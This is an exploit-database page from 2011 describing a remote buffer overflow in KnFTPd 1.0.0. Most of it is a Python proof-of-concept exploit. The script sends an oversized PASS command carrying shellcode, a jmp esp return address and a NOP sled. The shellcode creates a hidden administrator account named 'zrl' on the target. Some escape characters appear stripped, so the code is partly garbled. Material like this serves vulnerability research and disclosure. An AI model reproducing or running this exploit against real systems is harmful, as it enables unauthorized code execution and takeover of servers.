Home / exploitsPDF  

KnFTPd 1.0.0 Buffer Overflow

Posted on 03 September 2011

KnFTPd FTP Server v1.0.0 is vulnerable to a buffer overflow caused by improper bounds checking.
By sending an overly long request to Multpile FTP command(USER,PASS,REIN,QUIT,PORT,PASV,TYPE,STRU,MODE,RETR,STOR,
APPE,ALLO,REST,RNFR,RNTO,ABOR,DELE,CWD,LIST,NLST,SITE,STST,HELP,NOOP,MKD,RMD,PWD,CDUP,STOU,SNMT,SYST,XPWD),
a remote attacker could overflow a buffer and execute arbitrary code on the system with elevated privileges or cause the application to crash.

The sample PoC of exploit is shown as follows:
-----------------------------------------------
# !/usr/bin/python
# KnFTPd FTP Server v1.0.0 Multiple Command Remote Buffer Overflow Exploit
# Software Link: http://sourceforge.net/projects/knftp/files/KnFTPd/1.0.0/
# Affected Version:1.0.0
# Affected Command:
# "USER","PASS","REIN","QUIT","PORT","PASV","TYPE","STRU",
# "MODE","RETR","STOR","APPE","ALLO","REST","RNFR","RNTO",
# "ABOR","DELE","CWD","LIST","NLST","SITE","STST","HELP",
# "NOOP","MKD","RMD","PWD","CDUP","STOU","SNMT","SYST","XPWD"
#
# Vulnerability Discovered by Qixu Liu of NCNIPC (liuqx@nipc.org.cn)
# Date: 02/09/2011
# Thanks to: Zhejun Fang, Cheng Luo
# Tested on: Windows XP SP3 Chinese (zh-cn)
# Shellcode: Exploiting "PASS" Command to add a new system user "zrl:123456"

from struct import pack
import socket,sys
import os

if len(sys.argv) != 3:
print "Usage: knftpd_exploit.py [IP] [PORT]"
sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])

shellcode= 	     "x33xdbxb7x02x2bxe3"
shellcode+=          "xebx1bx5bx31xc0x50x31xc0x88x43x5dx53xbbxadx23x86x7c"
shellcode+=          "xffxd3x31xc0x50xbbxfaxcax81x7cxffxd3xe8xe0xffxffxff"
shellcode+=          "x63x6dx64x2ex65x78x65x20x2fx63x20x6ex65x74x20x75x73"
shellcode+=          "x65x72x20x7ax72x6cx20x31x32x33x34x35x36x20x2fx61x64"
shellcode+=          "x64x20x26x26x20x6ex65x74x20x6cx6fx63x61x6cx67x72x6f"
shellcode+=          "x75x70x20x41x64x6dx69x6ex69x73x74x72x61x74x6fx72x73"
shellcode+=          "x20x2fx61x64x64x20x7ax72x6cx20x26x26x20x6ex65x74x20"
shellcode+=          "x75x73x65x72x20x7ax72x6c"

eip ="x12x45xfax7f"	#jmp esp
eip += "x90"*8
eip += "xe9x06xffxffxff"
nops = "x90" * 157

payload = "x90" * 57 + shellcode + "x90" * 94 +eip

print "[+] Connecting to Target " + target + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
connect=s.connect((target, port))
print "[+] Target FTP Connected!"
except:
print "[!] FTP didn't respond
"
sys.exit(0)

s.send('USER test 
')
s.recv(1024)

print "[+] Sending payload...length " +str(len(payload))
s.send('PASS ' + payload +' 
')
s.recv(1024)

print "[!] Exploit has been sent!. Please check the new user 'zrl'
"
s.close()

 

TOP

Malware :

Exploits :